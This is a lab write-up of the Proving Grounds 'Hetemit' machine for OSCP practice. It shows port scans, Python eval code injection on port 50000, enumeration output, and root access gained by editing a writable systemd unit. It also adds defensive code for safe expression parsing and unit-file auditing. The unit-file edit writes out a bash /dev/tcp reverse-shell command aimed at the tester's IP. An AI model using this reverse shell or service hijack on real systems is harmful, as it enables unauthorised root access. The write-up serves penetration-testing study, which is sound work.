Proving Grounds Practice-Hetemit

admin · 2023-09-25 00:05:38 · 46 views · 11,829 characters · 39 min 25 s read

Preface

Write-ups for the machines in Proving Grounds Practice will keep being added here. I recently passed the OSCP exam, so I am sharing all of my notes from the practice machines. The machine recommendations all come from this list: https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159
Some of those machines are no longer in Proving Grounds Practice, so there is no write-up for them. This series will cover roughly 40 machines. If you get stuck while practising, dig into it on your own first and only then read the write-up. Always remember: Try Harder.

Structure of this article

In general, the write-ups in this series follow this structure:

  1. Port scanning
  2. Web enumeration or port enumeration
  3. Gaining a foothold
  4. Privilege escalation

Machine name: Hetemit | Difficulty: Intermediate

Port enumeration

┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ ./nmapAutomator.sh -H 192.168.151.117 -t full

Running a full scan on 192.168.151.117

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
18000/tcp open  biimenu
50000/tcp open  ibm-db2

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.194
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp    open  ssh         OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)
|   256 74:dd:fa:f2:51:dd:74:38:2b:b2:ec:82:e5:91:82:28 (ECDSA)
|_  256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)
80/tcp    open  http        Apache httpd 2.4.37 ((centos))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
18000/tcp open  biimenu?
50000/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.6.8)
|_http-server-header: Werkzeug/1.0.1 Python/3.6.8
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Unix

21 FTP

┌──(aaron㉿aacai)-[~/Desktop/Script/nmapAutomator]
└─$ ftp 192.168.151.117                                 
Connected to 192.168.151.117.
220 (vsFTPd 3.0.3)
Name (192.168.151.117:aaron): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||22087|)
receive aborted. Waiting for remote to finish abort.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
421 Service not available, user interrupt. Connection closed.
ftp> exit

FTP allows anonymous login, but no command could be run.

80 HTTP


Port 80 only serves the default Apache page, so there is no further information to be had there.

18000 Protomba

I tried to create a user, but I do not have an invite code, so the registration failed.


50000


Visiting port 50000 shows two paths.


Generate shows an example.


Verify only shows a single code parameter, but if I try to use code to do some computation, it runs.


As you can see, when I submit the parameter 2*2 via POST the result that comes back is 4, which means there is probably RCE here; and since Werkzeug is developed in Python, trying os.system to get a reverse shell may well succeed.


OK, it works; I now have an interactive reverse shell.
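The Verify endpoint evaluates whatever arrives in `code` as a Python expression, which is why `2*2` returns `4` and why `os.system` works. The block below is an added example, not the Hetemit app's code: the `eval()` pattern behind that behaviour next to a hardened replacement that parses the input with `ast` and interprets only arithmetic nodes, so names, attribute access and calls are rejected before anything runs; the function names are mine.

```python
import ast
import operator

_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
            ast.Div: operator.truediv, ast.Mod: operator.mod, ast.Pow: operator.pow}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}
MAX_EXPONENT = 64  # bounds "2**n" inputs so a code value cannot exhaust CPU or memory

def verify_unsafe(code: str):
    """The pattern the write-up exploits: eval() on an attacker-controlled string.
    Any expression, not just arithmetic, runs with the Flask worker's privileges."""
    return eval(code)

def _eval_node(node):
    """Interpret a whitelisted subset of the expression AST ourselves."""
    if isinstance(node, ast.Expression):
        return _eval_node(node.body)
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        left, right = _eval_node(node.left), _eval_node(node.right)
        if isinstance(node.op, ast.Pow) and abs(right) > MAX_EXPONENT:
            raise ValueError("exponent too large")
        return _BIN_OPS[type(node.op)](left, right)
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    # Names, attribute access, calls, subscripts and strings are all rejected here,
    # so inputs such as __import__('os') or ().__class__ never reach the interpreter.
    raise ValueError(f"disallowed expression element: {type(node).__name__}")

def verify_safe(code: str, max_len: int = 64):
    """Hardened replacement: parse to an AST, then walk it with _eval_node."""
    if len(code) > max_len:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(code, mode="eval")
    except SyntaxError as exc:
        raise ValueError("not a valid expression") from exc
    try:
        return _eval_node(tree)
    except (ZeroDivisionError, OverflowError) as exc:
        raise ValueError(f"arithmetic error: {exc}") from exc

def is_rejected(code: str) -> bool:
    """True when verify_safe refuses the input; handy for quick regression checks."""
    try:
        verify_safe(code)
    except ValueError:
        return True
    return False
```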


Privilege escalation

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version                                                                 
Sudo version 1.8.29 

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                                         
/home/cmeeks/.rvm/gems/ruby-2.6.3/bin:/home/cmeeks/.rvm/gems/ruby-2.6.3@global/bin:/home/cmeeks/.rvm/rubies/ruby-2.6.3/bin:/home/cmeeks/.local/bin:/home/cmeeks/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/home/cmeeks/.rvm/bin:/home/cmeeks/.rvm/bin


╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/pythonapp.service
/etc/systemd/system/multi-user.target.wants/pythonapp.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/railsapp.service could be executing some relative path
/etc/systemd/system/pythonapp.service
/etc/systemd/system/pythonapp.service could be executing some relative path
/etc/systemd/system/railsapp.service could be executing some relative path


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                   
tcp        0      0 0.0.0.0:18000           0.0.0.0:*               LISTEN      1409/puma 4.3.6 (tc                                             
tcp        0      0 0.0.0.0:50000           0.0.0.0:*               LISTEN      1410/python3.6      
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:5355            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::445                  :::*                    LISTEN      -                   
tcp6       0      0 :::5355                 :::*                    LISTEN      -                   
tcp6       0      0 :::139                  :::*                    LISTEN      -     

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                
Matching Defaults entries for cmeeks on hetemit:                                                                                                
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin:/bin:/usr/sbin:/usr/bin

User cmeeks may run the following commands on hetemit:
    (root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff


╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash                                                                                                                 

╔══════════╣ Users with console
cmeeks:x:1000:1000::/home/cmeeks:/bin/bash                                                                                                      
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)                                                                                                          
uid=1000(cmeeks) gid=1000(cmeeks) groups=1000(cmeeks)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=193(systemd-resolve) gid=193(systemd-resolve) groups=193(systemd-resolve)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=26(postgres) gid=26(postgres) groups=26(postgres)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=48(apache) gid=48(apache) groups=48(apache)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=59(tss) gid=59(tss) groups=59(tss)
uid=5(sync) gid=0(root) groups=0(root)
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=7(halt) gid=0(root) groups=0(root)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=991(unbound) gid=987(unbound) groups=987(unbound)
uid=992(rngd) gid=988(rngd) groups=988(rngd)
uid=993(chrony) gid=989(chrony) groups=989(chrony)
uid=994(sssd) gid=990(sssd) groups=990(sssd)
uid=995(cockpit-wsinstance) gid=992(cockpit-wsinstance) groups=992(cockpit-wsinstance)
uid=996(cockpit-ws) gid=993(cockpit-ws) groups=993(cockpit-ws)
uid=997(libstoragemgmt) gid=995(libstoragemgmt) groups=995(libstoragemgmt)
uid=998(polkitd) gid=996(polkitd) groups=996(polkitd)
uid=999(systemd-coredump) gid=997(systemd-coredump) groups=997(systemd-coredump)

╔══════════╣ Useful software
/usr/bin/base64                                                                                                                                 
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/ncat
/usr/bin/perl
/usr/sbin/ping
/usr/bin/python3
/usr/bin/python3.6
/home/cmeeks/.rvm/rubies/ruby-2.6.3/bin/ruby
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget


╔══════════╣ Analyzing PostgreSQL Files (limit 70)
Version: psql (PostgreSQL) 10.14                                                                                                                


-rw-r--r-- 1 root root 268 Sep 15  2020 /etc/postgresql-setup/upgrade/postgresql.conf
id              postgresql
major           9.2
data_default    /var/pgsql/data
package         postgresql-upgrade
engine          /usr/lib64/pgsql/postgresql-9.2/bin
description     "Upgrade data from system PostgreSQL version (PostgreSQL 9.2)"
redhat_sockets_hack no
-rw-r--r-- 1 root root 47 Sep 15  2020 /usr/lib/tmpfiles.d/postgresql.conf
d /var/run/postgresql 0755 postgres postgres -


╔══════════╣ Analyzing Jenkins Files (limit 70)
-rw------- 1 cmeeks cmeeks 32 Nov 12  2020 /home/cmeeks/register_hetemit/config/master.key                                                      
13d501513ae570e4d2e50edfa97de275

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d                                                 
You have write privileges over /etc/systemd/system/pythonapp.service

This shows that user cmeeks has permission to modify pythonapp.service, so let's look at the contents of this configuration file.

[cmeeks@hetemit tmp]$ cat /etc/systemd/system/pythonapp.service
cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target

[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure

[Install]
WantedBy=multi-user.target
[cmeeks@hetemit tmp]$ 

Here you can see that ExecStart runs a command, and the current user has permission to modify this configuration, so change it to a reverse-shell command.

[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.194/18000 0>&1'
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure

Then use sudo /sbin/reboot to restart the server; after a short wait, the reverse shell connects back.

└─$ nc -nlvp 18000
listening on [any] 18000 ...
connect to [192.168.45.194] from (UNKNOWN) [192.168.151.117] 35558
bash: cannot set terminal process group (995): Inappropriate ioctl for device
bash: no job control in this shell
[root@hetemit restjson_hetemit]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@hetemit restjson_hetemit]# cd /root 
[root@hetemit ~]# ls
anaconda-ks.cfg
proof.txt
[root@hetemit ~]# cat proof.txt

5746a9a08b069e01dff4670af94c88a0
[root@hetemit ~]
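The root path combines two findings linpeas already listed: the unit file is writable by cmeeks, and `ExecStart=flask run ...` resolves its program through `PATH`. As an added example (not from the write-up or the target), the script below audits a directory of unit files for non-root ownership, group/other write bits and Exec lines that do not start with an absolute path, using constructed sample units written to a temporary directory; `demo()` and the sample contents are mine.

```python
import os
import stat
import tempfile
from pathlib import Path

EXEC_KEYS = ("ExecStart", "ExecStartPre", "ExecStartPost", "ExecReload", "ExecStop")

def service_section(text):
    """Return the [Service] keys of a unit file as key -> list of values."""
    section, service = None, {}
    for line in (ln.strip() for ln in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "Service" and "=" in line and line[0] not in "#;":
            key, value = line.split("=", 1)
            service.setdefault(key.strip(), []).append(value.strip())
    return service

def audit_unit(path):
    """(kind, detail) findings: non-root owner, group/other write bit, relative Exec* program."""
    findings, st = [], os.stat(path)
    if st.st_uid != 0:
        findings.append(("owner", f"owned by uid {st.st_uid}, not root"))
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("writable", f"mode {oct(stat.S_IMODE(st.st_mode))} grants group/other write"))
    for key, values in service_section(Path(path).read_text()).items():
        for value in (values if key in EXEC_KEYS else ()):
            tokens = value.lstrip("-@+!:").split()  # drop systemd's executable-prefix characters
            if tokens and not tokens[0].startswith("/"):
                findings.append(("relative-exec", f"{key}={value} resolves {tokens[0]!r} via PATH"))
    return findings

def audit_dir(unit_dir):
    """{path: findings} for every *.service under unit_dir that has at least one finding."""
    results = {str(p): audit_unit(p) for p in sorted(Path(unit_dir).glob("*.service"))}
    return {p: f for p, f in results.items() if f}

# Constructed sample units (not copied from the target) so the audit can run offline.
SAMPLES = {
    "pythonapp.service": (0o666, "[Service]\nType=simple\nExecStart=flask run -h 0.0.0.0 -p 50000\nUser=cmeeks\n"),
    "fixed.service": (0o644, "[Service]\nType=simple\nExecStart=/usr/bin/python3 -m flask run -p 50000\nUser=cmeeks\n"),
}

def demo():
    """Write the samples with the given modes into a temp dir; return finding kinds per unit,
    minus the owner finding, which depends on which uid runs this script."""
    tmp = Path(tempfile.mkdtemp())
    for name, (mode, text) in SAMPLES.items():
        (tmp / name).write_text(text)
        os.chmod(tmp / name, mode)
    return {Path(p).name: sorted({k for k, _ in f if k != "owner"}) for p, f in audit_dir(tmp).items()}
```

Run it against /etc/systemd/system on a real host with `audit_dir("/etc/systemd/system")`; any "writable" or "relative-exec" finding on a unit that runs as root is worth fixing before an attacker with sudo reboot rights finds it.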


END

OSCP (Offensive Security Certified Professional), known in Chinese as 国际注册渗透测试专家认证, is a 200-level certification from Offensive Security aimed primarily at the field of penetration testing.
The OSCP is a technical certification covering penetration testing and attack techniques. Holders have passed a hands-on exam in which they penetration-test a target network and obtain administrator access. It is produced by Offensive Security, and the exam covers network penetration testing, vulnerability discovery and exploitation. The exam is fairly difficult and requires practical skills and experience; holding the certificate demonstrates a practical, in-depth understanding of penetration testing and related attack techniques.

If you found this article helpful, please follow and give it a like; thanks for your support :)

Contact me


WeChat ID:wengchensmile
Email Address: [email protected] (personal)


Originally published on the WeChat official account Aaron与安全的那些事: Proving Grounds Practice-Hetemit

Posted by admin on 2023-09-25 00:05:38. Source link (CN-SEC; please keep it when reposting, with thanks to the original author): http://cn-sec.com/archives/2064122.html
